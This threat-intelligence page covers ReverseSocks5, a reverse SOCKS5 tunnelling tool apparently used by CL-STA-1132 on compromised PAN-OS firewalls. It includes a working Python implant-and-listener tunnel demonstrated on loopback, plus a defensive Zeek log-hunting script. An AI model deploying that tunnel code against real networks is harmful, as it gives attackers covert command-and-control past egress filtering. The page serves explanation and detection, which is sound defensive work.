
ReverseSocks5
Open-source reverse SOCKS5 proxy used alongside EarthWorm for redundant C2 tunnels.
Last refreshed: 8 May 2026 · Appears in 1 active topic
Timeline for ReverseSocks5
Deployed by CL-STA-1132 alongside EarthWorm for C2 masking
Cybersecurity: Threats and Defences: CL-STA-1132 exploited PAN-OS since 16 April, log destruction confirmed
- What is a reverse SOCKS5 proxy in hacking?
- A reverse SOCKS5 proxy lets an implant on a victim machine initiate an outbound connection to attacker infrastructure; the attacker's side then exposes a local SOCKS5 listener and routes traffic back through that connection into the victim's network. Because the victim dials out, the tunnel works through egress policies that block inbound connections while allowing outbound ones.
- Why do attackers use both EarthWorm and ReverseSocks5 together?
- Two independent tunnelling tools give redundant command-and-control: if defenders detect and block one tunnel, or the attacker addresses behind it, the other stays up. CL-STA-1132 deployed both on compromised PAN-OS firewalls to keep access during its April 2026 intrusion campaign.
- How do you detect SOCKS5 tunnelling malware?
- Detection relies on behaviour rather than file signatures: SOCKS5 handshakes or long-lived outbound sessions from hosts that do not normally proxy, binaries executing on network appliances that should never run arbitrary programs, unusual outbound connection volumes or repeated reconnects to the same endpoint, and process lineage analysis. ReverseSocks5 and EarthWorm are public tools, so their hashes and strings are trivially changed by recompiling, and static signatures cannot be relied on by themselves.
Background
ReverseSocks5 is an open-source reverse SOCKS5 proxy tool used in penetration testing and offensive security operations. In a conventional SOCKS5 pivot the proxy listens on the compromised host and the attacker connects in to it, which inbound filtering on a perimeter device will normally block. A reverse SOCKS5 configuration flips the direction of the TCP connection: the implant on the victim initiates an outbound connection to the attacker's server, the server exposes a local SOCKS5 listener on the attacker's side, and traffic entering that listener is carried back through the implant's outbound connection and out into the victim network. The tool is therefore useful where inbound connections are blocked but outbound connections are permitted.
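The direction of each connection described above, as an added end-to-end example written for this page (it is not code from the ReverseSocks5 project or from the reporting this page summarises). Assumptions: everything runs on loopback, one tunnelled session at a time, the NO AUTH method only, and only the CONNECT command with IPv4 or domain-name targets; the echo service, ports and payload are constructed. Real tools multiplex many sessions over the callback and usually encrypt and authenticate it, none of which is shown here.

```python
"""Reverse SOCKS5 tunnel demo, constructed for this page (assumptions in the lead-in)."""
import socket
import struct
import threading
from contextlib import suppress

socket.setdefaulttimeout(10)  # a stalled handshake times out instead of hanging

def _recvn(sock, n):
    """Read exactly n bytes (SOCKS5 fields are fixed-length) or raise."""
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed mid-handshake")
        buf += chunk
    return buf

def _pipe(src, dst):
    """Copy src -> dst until EOF, then half-close dst so the EOF propagates."""
    with suppress(OSError):
        while chunk := src.recv(4096):
            dst.sendall(chunk)
    with suppress(OSError):
        dst.shutdown(socket.SHUT_WR)

def _relay(a, b):
    """Splice two sockets in both directions; returns once both sides hit EOF."""
    t = threading.Thread(target=_pipe, args=(a, b), daemon=True)
    t.start()
    _pipe(b, a)
    t.join()
    a.close()
    b.close()

def _fail(tunnel, rep):
    """Send an RFC 1928 error reply (REP code) and drop the session."""
    tunnel.sendall(b"\x05" + bytes([rep]) + b"\x00\x01" + b"\x00" * 6)
    tunnel.close()

def implant_side(attacker_host, callback_port):
    """Victim side: dial OUT to the attacker and be the SOCKS5 server on that link."""
    tunnel = socket.create_connection((attacker_host, callback_port))
    _ver, nmethods = _recvn(tunnel, 2)           # greeting: VER, NMETHODS
    _recvn(tunnel, nmethods)                     # offered methods (ignored)
    tunnel.sendall(b"\x05\x00")                  # select NO AUTH
    _ver, cmd, _rsv, atyp = _recvn(tunnel, 4)    # request: VER CMD RSV ATYP
    if atyp == 1:                                # IPv4 address
        host = socket.inet_ntoa(_recvn(tunnel, 4))
    elif atyp == 3:                              # length-prefixed domain name
        host = _recvn(tunnel, _recvn(tunnel, 1)[0]).decode()
    else:                                        # IPv6 not handled here
        return _fail(tunnel, 0x08)               # address type not supported
    port = struct.unpack("!H", _recvn(tunnel, 2))[0]
    if cmd != 1:
        return _fail(tunnel, 0x07)               # command not supported
    try:
        target = socket.create_connection((host, port))
    except OSError:
        return _fail(tunnel, 0x05)               # connection refused
    tunnel.sendall(b"\x05\x00\x00\x01" + b"\x00" * 6)   # REP=0: succeeded
    _relay(tunnel, target)                       # the implant never listens

def attacker_side(callback_sock, socks_sock):
    """Attacker side: take the implant's callback, splice a local SOCKS client onto it."""
    implant, _ = callback_sock.accept()          # inbound-initiated by the victim
    client, _ = socks_sock.accept()              # attacker's own tooling
    _relay(client, implant)

def socks5_connect(proxy_port, host, port):
    """Plain SOCKS5 client (proxychains-style); returns a socket to host:port via the tunnel."""
    s = socket.create_connection(("127.0.0.1", proxy_port))
    s.sendall(b"\x05\x01\x00")                   # one method offered: NO AUTH
    if _recvn(s, 2) != b"\x05\x00":
        raise ConnectionError("proxy refused NO AUTH")
    s.sendall(b"\x05\x01\x00\x03" + bytes([len(host)]) + host.encode()
              + struct.pack("!H", port))         # CONNECT, ATYP=3 (domain)
    rep = _recvn(s, 10)   # VER REP RSV ATYP BND.ADDR(4) BND.PORT(2); implant replies ATYP=1
    if rep[1] != 0:
        raise ConnectionError(f"CONNECT failed, REP=0x{rep[1]:02x}")
    return s

def run_demo(payload=b"hello through the reverse tunnel"):
    """Constructed loopback run: an echo service stands in for a host on the victim LAN."""
    target = socket.create_server(("127.0.0.1", 0))
    def echo():
        c, _ = target.accept()
        with c:
            c.sendall(b"".join(iter(lambda: c.recv(4096), b"")))
    threading.Thread(target=echo, daemon=True).start()
    callback, socks = [socket.create_server(("127.0.0.1", 0)) for _ in range(2)]
    threading.Thread(target=attacker_side, args=(callback, socks), daemon=True).start()
    threading.Thread(target=implant_side,
                     args=("127.0.0.1", callback.getsockname()[1]), daemon=True).start()
    with socks5_connect(socks.getsockname()[1], "127.0.0.1", target.getsockname()[1]) as cli:
        cli.sendall(payload)
        cli.shutdown(socket.SHUT_WR)             # EOF travels through the tunnel too
        return b"".join(iter(lambda: cli.recv(4096), b""))
```

Calling run_demo() returns the payload echoed back from the target: the attacker-side SOCKS client reached a host only the implant could connect to, over a TCP connection the implant opened. Note which side performs the SOCKS5 handshake: the attacker's tooling sends the greeting and CONNECT, the implant answers them and opens the onward connection, so the roles of the protocol are unchanged and only the transport connection is reversed.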
Like EarthWorm, ReverseSocks5 is a publicly available red-team tool rather than bespoke malware, which complicates signature-based detection. It runs as a single portable binary and, if dropped in a temporary directory and removed after use, leaves few forensic artefacts on disk. Detection therefore depends on behavioural monitoring for unexpected outbound connections and anomalous binary execution on high-value hosts such as network appliances.
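One way to turn the behavioural monitoring described above into a check, as an added example that is not from any vendor, from the ReverseSocks5 or EarthWorm projects, or from the reporting this page summarises. The input layout is Zeek conn.log (the field names are Zeek's); the sample records, appliance addresses, egress allowlist and thresholds are constructed assumptions. It flags two shapes of the same signal: an appliance holding one long, bidirectional session open to a non-allowlisted host, and an appliance repeatedly re-dialling one endpoint, which is what a tunnel implant does after its link drops.

```python
"""Hunting reverse-tunnel traffic in Zeek conn.log-style records. Constructed
example for this page, not vendor or project code; hosts, allowlist and
thresholds are assumptions and the sample log is made up."""
from collections import defaultdict

# Assumed: management addresses of network appliances that should only ever
# dial out to a short list of vendor and infrastructure destinations.
APPLIANCE_HOSTS = {"10.0.0.1", "10.0.0.2"}
# Assumed egress allowlist for those appliances (DNS, vendor update server).
ALLOWED_DESTS = {"10.0.0.53", "203.0.113.10"}
LONG_LIVED_SECONDS = 600   # one session held open for 10 minutes or more
REDIAL_COUNT = 5           # same src/dst/port re-dialled at least this often

# Constructed sample in Zeek conn.log layout: a #fields header, then one
# tab-separated record per connection, '-' meaning the field is unset.
_FIELDS = ["ts", "id.orig_h", "id.orig_p", "id.resp_h", "id.resp_p",
           "duration", "orig_bytes", "resp_bytes"]
_ROWS = [
    ("1776600000.0", "10.0.0.1", "51000", "203.0.113.10", "443", "2.1", "812", "4096"),
    ("1776600060.0", "10.0.0.1", "51001", "10.0.0.53", "53", "0.01", "60", "120"),
    ("1776600100.0", "10.0.0.1", "51002", "198.51.100.77", "443", "5400.0", "1258291", "845120"),
    ("1776600200.0", "10.0.0.9", "40000", "198.51.100.77", "443", "7200.0", "-", "-"),
] + [  # six reconnects in three minutes from the second firewall
    (str(1776603000.0 + 30 * i), "10.0.0.2", str(52000 + i), "198.51.100.78", "8443", "3.0", "512", "128")
    for i in range(6)
]
SAMPLE_CONN_LOG = "\n".join(["#fields\t" + "\t".join(_FIELDS)] + ["\t".join(r) for r in _ROWS])


def _num(value, cast=float):
    """Zeek writes '-' for unset numeric fields; treat those as zero."""
    return cast(value) if value != "-" else cast(0)


def parse_conn_log(text):
    """Parse the fields this check needs from conn.log text (TSV with #fields)."""
    fields, records = None, []
    for line in text.splitlines():
        if line.startswith("#fields"):
            fields = line.split("\t")[1:]
        elif line and not line.startswith("#"):
            if fields is None:
                raise ValueError("conn.log has no #fields header")
            row = dict(zip(fields, line.split("\t")))
            records.append({
                "ts": float(row["ts"]), "src": row["id.orig_h"],
                "dst": row["id.resp_h"], "dport": int(row["id.resp_p"]),
                "duration": _num(row["duration"]),
                "orig_bytes": _num(row["orig_bytes"], int),
                "resp_bytes": _num(row["resp_bytes"], int),
            })
    return records


def flag_tunnel_candidates(records):
    """Appliance-originated sessions that look like an implant holding, or
    repeatedly re-establishing, an outbound tunnel to a non-allowlisted host."""
    findings, redials = [], defaultdict(list)
    for r in records:
        if r["src"] not in APPLIANCE_HOSTS or r["dst"] in ALLOWED_DESTS:
            continue  # not an appliance, or known-good egress
        redials[(r["src"], r["dst"], r["dport"])].append(r["ts"])
        # A reverse tunnel carries traffic both ways for as long as the
        # attacker is using it, so look for long, bidirectional sessions.
        if r["duration"] >= LONG_LIVED_SECONDS and r["orig_bytes"] and r["resp_bytes"]:
            findings.append({"rule": "long_lived_outbound", "src": r["src"],
                             "dst": r["dst"], "dport": r["dport"],
                             "duration": r["duration"]})
    # Tunnel implants reconnect when the link drops; many short sessions to
    # one endpoint from an appliance are the same signal in a different shape.
    for (src, dst, dport), stamps in redials.items():
        if len(stamps) >= REDIAL_COUNT:
            findings.append({"rule": "repeated_redial", "src": src, "dst": dst,
                             "dport": dport, "count": len(stamps),
                             "span_seconds": max(stamps) - min(stamps)})
    return findings
```

On the sample, flag_tunnel_candidates(parse_conn_log(SAMPLE_CONN_LOG)) returns one long_lived_outbound finding for 10.0.0.1 and one repeated_redial finding for 10.0.0.2; the workstation 10.0.0.9 is ignored because it is not an appliance. This is a triage aid, not a signature: appliances do hold legitimate long-lived outbound sessions (site-to-site VPN, log forwarding, cloud management), and those destinations must be in the allowlist or the check will page on them.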
In U#3, CL-STA-1132 deployed ReverseSocks5 alongside EarthWorm on compromised PAN-OS firewalls following exploitation of CVE-2026-0300. Running two independent tunnelling tools at once gave the intrusion resilient C2: if defenders blocked one tunnel type, or connections to one set of attacker-controlled IPs, the alternate tunnel stayed operational. The pair is a recurring combination in Chinese-nexus intrusion sets that prioritise persistence and operational security.